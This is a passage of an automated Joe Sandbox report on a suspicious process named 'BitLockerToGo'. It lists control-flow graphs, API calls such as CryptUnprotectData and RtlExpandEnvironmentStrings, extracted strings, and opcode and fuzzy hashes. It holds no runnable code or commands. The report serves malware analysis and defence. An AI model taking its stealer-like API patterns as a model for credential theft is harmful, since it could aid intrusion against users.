2cfb09f-2cfb0a1 690->694 695 2cfb077-2cfb07b 691->695 692->678 692->681 693->692 696 2cfb0a7-2cfb0e4 694->696 697 2cfb1c4 694->697 695->697 698 2cfb081-2cfb088 695->698 701 2cfb0e6 696->701 702 2cfb120-2cfb127 696->702 703 2cfb1c6 697->703 699 2cfb08e 698->699 700 2cfb08a-2cfb08c 698->700 704 2cfb070-2cfb075 699->704 705 2cfb090-2cfb094 699->705 700->699 706 2cfb0f0-2cfb11e 701->706 707 2cfb129-2cfb134 702->707 708 2cfb164-2cfb16b 702->708 703->673 704->694 704->695 705->704 706->702 706->706 710 2cfb149-2cfb14d 707->710 709 2cfb170-2cfb177 708->709 709->703 710->697 711 2cfb14f-2cfb156 710->711 712 2cfb15c 711->712 713 2cfb158-2cfb15a 711->713 714 2cfb15e-2cfb162 712->714 715 2cfb140-2cfb147 712->715 713->712 714->715 715->710 716 2cfb179-2cfb17b 715->716 716->697 717 2cfb17d-2cfb193 716->717 717->709 718 2cfb195-2cfb198 717->718 718->709 719 2cfb19a-2cfb1ba call 2cffde0 718->719 719->709 722 2cfb1bc-2cfb1c0 719->722 722->718 723 2cfb1c2 722->723 723->709
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $%$P!_'$g$$uw$y{
                                                              • API String ID: 0-2479004300
                                                              • Opcode ID: 1d271a36b84f1661ec5e9c16704dd33db2610152068f142d5a64ac3299710753
                                                              • Instruction ID: e25779f80cb1ea975c3cb5fedc6c858aebec47afe9525deee02d90ef6ac2068e
                                                              • Opcode Fuzzy Hash: 1d271a36b84f1661ec5e9c16704dd33db2610152068f142d5a64ac3299710753
                                                              • Instruction Fuzzy Hash: A70226B15083918BD3A4CF14C49475BFBE2BBC6348F188E1CEAE55B385D77699098B82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D0D343 Relevance: 6.5, APIs: 4, Instructions: 493COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 724 2d0d343-2d0d3db 725 2d0d418-2d0d44f RtlExpandEnvironmentStrings 724->725 726 2d0d3dd-2d0d3df 724->726 728 2d0d451-2d0d456 725->728 729 2d0d458 725->729 727 2d0d3e0-2d0d416 726->727 727->725 727->727 730 2d0d45b-2d0d4da call 2cf8b30 RtlExpandEnvironmentStrings 728->730 729->730 733 2d0d519-2d0d53c 730->733 734 2d0d4dc-2d0d4df 730->734 736 2d0d545-2d0d547 733->736 737 2d0d53e-2d0d543 733->737 735 2d0d4e0-2d0d517 734->735 735->733 735->735 738 2d0d54a-2d0d560 call 2cf8b30 736->738 737->738 741 2d0d581-2d0d58c 738->741 742 2d0d562-2d0d567 738->742 744 2d0d5b3 741->744 745 2d0d58e-2d0d594 741->745 743 2d0d570-2d0d57f 742->743 743->741 743->743 747 2d0d5b6-2d0d5c5 call 2d2be30 744->747 746 2d0d5a0-2d0d5af 745->746 746->746 748 2d0d5b1 746->748 751 2d0d600-2d0d6f4 747->751 748->747 752 2d0d6f6 751->752 753 2d0d738-2d0d76f RtlExpandEnvironmentStrings 751->753 754 2d0d700-2d0d736 752->754 755 2d0d780 753->755 756 2d0d771-2d0d776 753->756 754->753 754->754 757 2d0d783-2d0d802 call 2cf8b30 RtlExpandEnvironmentStrings 755->757 756->757 760 2d0d804 757->760 761 2d0d849-2d0d86c 757->761 762 2d0d810-2d0d847 760->762 763 2d0d880-2d0d882 761->763 764 2d0d86e-2d0d873 761->764 762->761 762->762 765 2d0d885-2d0d89e call 2cf8b30 763->765 764->765 768 2d0d8a0-2d0d8a3 765->768 769 2d0d8c1-2d0d8cc 765->769 770 2d0d8b0-2d0d8bf 768->770 771 2d0d5d0 769->771 772 2d0d8d2-2d0d8d8 769->772 770->769 770->770 774 2d0d5d3-2d0d5e2 call 2d2be30 771->774 773 2d0d8e0-2d0d8ef 772->773 773->773 775 2d0d8f1 773->775 777 2d0d5e7-2d0d5fd 774->777 775->774 777->751
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 02D0D445
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 02D0D475
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: b035c5816ad200f22d5db1070d4e96dc3926860180450f3a1caaf06c020902de
                                                              • Instruction ID: 8e2ccb6259f44ee54b5092874ce1a70b15d29a2b3ec6c7590b80d691e7797ad0
                                                              • Opcode Fuzzy Hash: b035c5816ad200f22d5db1070d4e96dc3926860180450f3a1caaf06c020902de
                                                              • Instruction Fuzzy Hash: D60277B0600A018FD324CF29C895B23BBB2FF89314F15865DD8A64BBA5D774E856CBD1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF4BB0 Relevance: 5.5, Strings: 4, Instructions: 472COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 778 2cf4bb0-2cf4bd2 call 2cf8b30 781 2cf5238-2cf5241 778->781 782 2cf4bd8-2cf4c07 778->782 783 2cf4c09-2cf4c2d 782->783 784 2cf4c30-2cf4c35 call 2cf8b30 782->784 783->784 786 2cf4c3a-2cf4c43 784->786 787 2cf4c49-2cf4c5e 786->787 788 2cf5085-2cf508e call 2cf8b40 786->788 790 2cf4c71-2cf4c7a 787->790 788->781 792 2cf4c7c-2cf4c81 790->792 793 2cf4cb0-2cf4cb4 790->793 795 2cf4c83-2cf4c87 792->795 796 2cf4c60 792->796 794 2cf4cde-2cf4ce9 793->794 797 2cf4c62-2cf4c6b 794->797 798 2cf4c94-2cf4c9c 795->798 796->797 797->790 799 2cf4cee-2cf4cf5 797->799 800 2cf4c9e-2cf4ca3 798->800 801 2cf4c90-2cf4c92 798->801 802 2cf4cfc-2cf4e45 call 2cf8d50 * 3 799->802 803 2cf4cf7 799->803 800->801 801->798 804 2cf4cc0-2cf4ccf call 2cf8b50 801->804 814 2cf4e47-2cf4e50 802->814 815 2cf4eb0-2cf4ecd call 2cf3500 802->815 803->802 804->796 809 2cf4cd1-2cf4cd9 804->809 809->794 816 2cf4e86-2cf4eaa call 2cf3500 814->816 821 2cf5093-2cf5094 815->821 822 2cf4ed3-2cf504f 815->822 824 2cf4eac-2cf4eae 816->824 825 2cf4e60-2cf4e84 call 2cf3500 816->825 823 2cf5175-2cf518b call 2cf8b40 * 2 821->823 826 2cf50b7-2cf50f3 822->826 827 2cf5051-2cf505a 822->827 823->781 824->825 825->815 825->816 830 2cf515d-2cf515f 826->830 831 2cf50f5 826->831 832 2cf505c 827->832 833 2cf5074-2cf507c 827->833 837 2cf5161-2cf5164 830->837 838 2cf5190-2cf5196 830->838 836 2cf5100-2cf515b 831->836 839 2cf516a-2cf5174 832->839 840 2cf507e-2cf5083 833->840 841 2cf5070-2cf5072 833->841 836->830 836->836 844 2cf5198-2cf51ad 837->844 845 2cf5166-2cf5168 837->845 843 2cf51ec-2cf5234 call 2cf8b40 838->843 839->823 840->841 841->833 846 2cf5099-2cf50a5 call 2cf8b50 841->846 843->781 849 2cf51af-2cf51b6 844->849 845->849 846->839 854 2cf50ab-2cf50b3 846->854 849->843 852 2cf51b8-2cf51bf 849->852 855 2cf51c0-2cf51ea 852->855 854->826 855->843 855->855
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: )$IDAT$IEND$IHDR
                                                              • API String ID: 0-3181356877
                                                              • Opcode ID: 6e2ed5527ee63374aee5a1637635908a2850b7cfe353906a4f5ccfb3f8a056c0
                                                              • Instruction ID: a76ada115a39978377b2f6e9e718e96988306dccda65f6cdfc023306afc5d2fd
                                                              • Opcode Fuzzy Hash: 6e2ed5527ee63374aee5a1637635908a2850b7cfe353906a4f5ccfb3f8a056c0
                                                              • Instruction Fuzzy Hash: 88022771A083408FD7A8CF28D89076BBBE1EF95304F05866DEB859B381D775E909CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D28E70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(02D2BE0C,005C003F,00000006,00120089,?,00000018,ONA@,00000000,02D04E4A), ref: 02D28E96
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: ONA@
                                                              • API String ID: 2994545307-126421097
                                                              • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                              • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                                                              • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                              • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D10AD0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: K7NK$uFIz
                                                              • API String ID: 2994545307-3383845869
                                                              • Opcode ID: 3506ea996f46498c4aa64bc3be667639afa3045299fe3baa531c31c1896204ce
                                                              • Instruction ID: c718cad6d1af882ae40ec16cace3c66822d40a09209874374da0a67672c45c26
                                                              • Opcode Fuzzy Hash: 3506ea996f46498c4aa64bc3be667639afa3045299fe3baa531c31c1896204ce
                                                              • Instruction Fuzzy Hash: BBC115B1A08301AFD714DF18E89072BB7E2EF85719F18892DE98587781D375ED45CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D10352 Relevance: 1.8, Strings: 1, Instructions: 565COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `
                                                              • API String ID: 0-2679148245
                                                              • Opcode ID: 84a17f0652aeab339cb4e6ed8005525784c4f5e4293006fb0f3fbd590ad37c4d
                                                              • Instruction ID: 9265353cd5d600e43c75607c26675edcbde0e4036c9cb1327a5a5d35100f3b8f
                                                              • Opcode Fuzzy Hash: 84a17f0652aeab339cb4e6ed8005525784c4f5e4293006fb0f3fbd590ad37c4d
                                                              • Instruction Fuzzy Hash: 8C12A5B1908380DBD714EF14E49076BBBE1FB89309F584A2DE9C99B791D738D845CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D05977 Relevance: 1.5, APIs: 1, Instructions: 28encryptionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?), ref: 02D059A3
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: CryptDataUnprotect
                                                              • String ID:
                                                              • API String ID: 834300711-0
                                                              • Opcode ID: fbaa496429251621ea00a7fa0b700a16348c26be5dd8ccb30cb54f5206395e32
                                                              • Instruction ID: 1595947c5ef0403a8404fea1f123086a439c0bccc6b693ef8c2898fa29014ef2
                                                              • Opcode Fuzzy Hash: fbaa496429251621ea00a7fa0b700a16348c26be5dd8ccb30cb54f5206395e32
                                                              • Instruction Fuzzy Hash: 7FD0A7F05D0245ABE224DA20CD81F37F3ADEBC5201F11A81AF681D7342C9B0E8014B18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D13FD5 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ~}
                                                              • API String ID: 0-3738258182
                                                              • Opcode ID: 7e3214d8ea727d4bc800265c3166da61be51fe6d03e513ea1b512cf59f5f07a9
                                                              • Instruction ID: 9d02c7faef6c9cf4e62080eeaabdbc2ff65dfe6c16c23495f9a9fd9baad2a177
                                                              • Opcode Fuzzy Hash: 7e3214d8ea727d4bc800265c3166da61be51fe6d03e513ea1b512cf59f5f07a9
                                                              • Instruction Fuzzy Hash: 4C51DFB46083418BC724CF19D8617ABB3E2FFC5318F084A1CE8C6AB795E7749941CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D07AE2 Relevance: .3, Instructions: 305COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1cf888cb11db739ef1ecf0a31b7f4991e589e8997b8dbf781f2937e07b55db5
                                                              • Instruction ID: 132ab68fbd7d6c27e41a6e7d4221eec068c9ec57b7be451abe625c69d25ffb1f
                                                              • Opcode Fuzzy Hash: c1cf888cb11db739ef1ecf0a31b7f4991e589e8997b8dbf781f2937e07b55db5
                                                              • Instruction Fuzzy Hash: 69919E756083118BDB28CF18C8A176BB7E1FF95318F18491CE8968B3D0E778E945CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D26CF0 Relevance: .2, Instructions: 215COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2db526f53b6d214b12724dc16f6daadd0c4ac2bb7bdff94c50cdf9eccc64ef25
                                                              • Instruction ID: f260c0a2a3be00c8b5392224aa4991c202a97f81b8e1aae37092b09486cf79ba
                                                              • Opcode Fuzzy Hash: 2db526f53b6d214b12724dc16f6daadd0c4ac2bb7bdff94c50cdf9eccc64ef25
                                                              • Instruction Fuzzy Hash: BD619BB16083519BEB14CF14C994B2BBBE6FB9571CF18892DE5856B382D371DC08CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D0633E Relevance: .2, Instructions: 212COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ccdb4ae6fa09c72e2b5e734351d46e9b38519a848ad97f89af03770897365b89
                                                              • Instruction ID: e29ed47d3578d2c7e37e442a48572cf8e87083d0a7815e10783e372ec15fdded
                                                              • Opcode Fuzzy Hash: ccdb4ae6fa09c72e2b5e734351d46e9b38519a848ad97f89af03770897365b89
                                                              • Instruction Fuzzy Hash: E97174B02083519BE724CF14C8A076BB7F2EF85358F00991CE9C99B3A1E779D955CB86
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D291A2 Relevance: .2, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8288bbeb7f01986c924e509eea7b3d15df59912944f14146e355f02369849c9f
                                                              • Instruction ID: 8a7cfbaea85a2bf1c421d74ac57f77b4aa6d8864e781a76e67b0d2b4b894ee92
                                                              • Opcode Fuzzy Hash: 8288bbeb7f01986c924e509eea7b3d15df59912944f14146e355f02369849c9f
                                                              • Instruction Fuzzy Hash: 5C516970644B009FE3348F14C9A4B63B7F2BB95318F688A0DD5961BB95C3B1F80ACB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D05D07 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3bf0fc8fe527cd11c1c7fc86350f5311ead7aa95cdaaf886dd5cd8b4b3c1c889
                                                              • Instruction ID: 6e4a220cb1a0c86ba4fd06b3a8471c939de9f9a8911e87dd0afecc0520894983
                                                              • Opcode Fuzzy Hash: 3bf0fc8fe527cd11c1c7fc86350f5311ead7aa95cdaaf886dd5cd8b4b3c1c889
                                                              • Instruction Fuzzy Hash: 1721AF71A183019BD7188F14D5A472FBBE2BB85308F948A1DE8C617791C375EC42CBA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D1D4D1 Relevance: .0, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 510331f058a5b840c78e7f88dc09e3592cbdcbf7cfb770ad3c1d7a09406561b4
                                                              • Instruction ID: 209d89831391c7e04639d8351441b9ab3419a7c5d24fe3c3e2f6558b649af9fa
                                                              • Opcode Fuzzy Hash: 510331f058a5b840c78e7f88dc09e3592cbdcbf7cfb770ad3c1d7a09406561b4
                                                              • Instruction Fuzzy Hash: C9F0F2B46087008FC390DF34C18474BBBE2BB88308F608E1CDAAA47B45D375A909CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D1A923 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 80memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 38 2d1a923-2d1a9aa 39 2d1a9d4-2d1aa2b SysAllocString 38->39 40 2d1a9ac 38->40 42 2d1aa35-2d1aa5b 39->42 41 2d1a9ae-2d1a9d0 40->41 41->41 43 2d1a9d2 41->43 43->39
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: AllocString
                                                              • String ID: Q$S$U$W$Y$[
                                                              • API String ID: 2525500382-2221791194
                                                              • Opcode ID: adf649cfaf91500bd1202c437fadb73459a0f682b7013318e4d308dced158931
                                                              • Instruction ID: 408fea687d50a0364b81a6e7d80d00475d37a41df3c58b0fb3d07cf60e621d30
                                                              • Opcode Fuzzy Hash: adf649cfaf91500bd1202c437fadb73459a0f682b7013318e4d308dced158931
                                                              • Instruction Fuzzy Hash: C741C770108B81CEDB25CF28C498742BFE0AF56314F18868DD8E98F796C775D55ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D0DF00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 156COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 261 2d0df00-2d0dfc1 262 2d0dfc3 261->262 263 2d0e00a-2d0e04a RtlExpandEnvironmentStrings 261->263 264 2d0dfd0-2d0e008 262->264 265 2d0e053 263->265 266 2d0e04c-2d0e051 263->266 264->263 264->264 267 2d0e056-2d0e0e2 call 2cf8b30 RtlExpandEnvironmentStrings 265->267 266->267 270 2d0e131-2d0e13e call 2d07e70 267->270 271 2d0e0e4 267->271 274 2d0e143-2d0e146 270->274 272 2d0e0f0-2d0e12f 271->272 272->270 272->272
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 02D0E03E
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 02D0E06D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: LK$qx$AFG
                                                              • API String ID: 237503144-914270564
                                                              • Opcode ID: ad7f32151364cab03c4e3cba709ae7f1bde572e38fb881dda42c1fb0783a95b5
                                                              • Instruction ID: 128cdb2857e4a03f36a19bc822f950657b568f4cc5d3eb26ef587e6e0ed3afae
                                                              • Opcode Fuzzy Hash: ad7f32151364cab03c4e3cba709ae7f1bde572e38fb881dda42c1fb0783a95b5
                                                              • Instruction Fuzzy Hash: E55150B1108341AFD314CF14C890B5BBBE5EBC5798F108E2DF8A55B391D774D9088B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D051C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 856 2d051c0-2d051d4 857 2d051e0-2d051e8 856->857 857->857 858 2d051ea-2d0521c RtlExpandEnvironmentStrings 857->858 859 2d05225 858->859 860 2d0521e-2d05223 858->860 861 2d05228-2d052bd call 2cf8b30 RtlExpandEnvironmentStrings 859->861 860->861 864 2d052f6-2d05326 861->864 865 2d052bf 861->865 866 2d05328-2d0532d 864->866 867 2d0532f-2d05331 864->867 868 2d052c0-2d052f4 865->868 869 2d05334-2d05349 call 2cf8b30 866->869 867->869 868->864 868->868 872 2d05361-2d05371 869->872 873 2d0534b-2d0534e 869->873 875 2d05391-2d053a5 call 2d2bc60 872->875 876 2d05373-2d0537a 872->876 874 2d05350-2d0535f 873->874 874->872 874->874 879 2d053aa-2d053c6 875->879 877 2d05380-2d0538f 876->877 877->875 877->877
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02D0520D
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 02D0523F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: }|s
                                                              • API String ID: 237503144-1039199241
                                                              • Opcode ID: f31b6d3781c27600b2f762e5b32cad65aabd57d32de31c145b4947819c48f6a0
                                                              • Instruction ID: eeaf475708b31a70a24bcb0372972df17413f1f878aa4f037904e572cfae20bf
                                                              • Opcode Fuzzy Hash: f31b6d3781c27600b2f762e5b32cad65aabd57d32de31c145b4947819c48f6a0
                                                              • Instruction Fuzzy Hash: 9A51B0B11043409BD324CF24D895B6BB7E5FF89368F448A1CE9D99B3D1E7B49804CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF9390 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 880 2cf9390-2cf93ac call 2cf9430 call 2d28290 885 2cf93ae 880->885 886 2cf93b0-2cf93b7 call 2d23160 880->886 887 2cf93f6-2cf9402 ExitProcess 885->887 890 2cf93bb-2cf93e2 GetConsoleWindow call 2cf9410 call 2cfa7c0 886->890 891 2cf93b9 886->891 899 2cf93e6 call 2cfff50 890->899 900 2cf93e4 890->900 892 2cf93ef-2cf93f4 call 2d28d20 891->892 892->887 903 2cf93eb 899->903 901 2cf93ed 900->901 901->892 903->901
                                                              APIs
                                                              Strings
                                                              • in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified, xrefs: 02CF93C3
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID: in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified
                                                              • API String ID: 621844428-4175449110
                                                              • Opcode ID: 556f86d43f6bacaa95bd35ab05fe7df330449d06582389873d60f8a33e3579b9
                                                              • Instruction ID: 903c73392fb8462b33d66d60b74c6bf97fc42abe81ac8f347e809be51757b17a
                                                              • Opcode Fuzzy Hash: 556f86d43f6bacaa95bd35ab05fe7df330449d06582389873d60f8a33e3579b9
                                                              • Instruction Fuzzy Hash: 2FF0967080C224C7CEC03BB7954476A7BA99F61309F000816DB8A83284EB34491DDEA3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D17635 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 400COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 02D178ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: InstalledMemoryPhysicallySystem
                                                              • String ID: :h:
                                                              • API String ID: 3960555810-2449104794
                                                              • Opcode ID: 3d30108285ac59e905eeeebdb9006f49175de5d8e0aeb4c1627299dcabd8090c
                                                              • Instruction ID: 603caaca1fbd8dbe8b94e6d86838e1e30c06255c3925c99f2bc7116e18704cbe
                                                              • Opcode Fuzzy Hash: 3d30108285ac59e905eeeebdb9006f49175de5d8e0aeb4c1627299dcabd8090c
                                                              • Instruction Fuzzy Hash: C3D18D74245B808AE3358B39C454BA7FBE1BF56308F544A5DC4EA8BB92C739A805CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D28B9D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
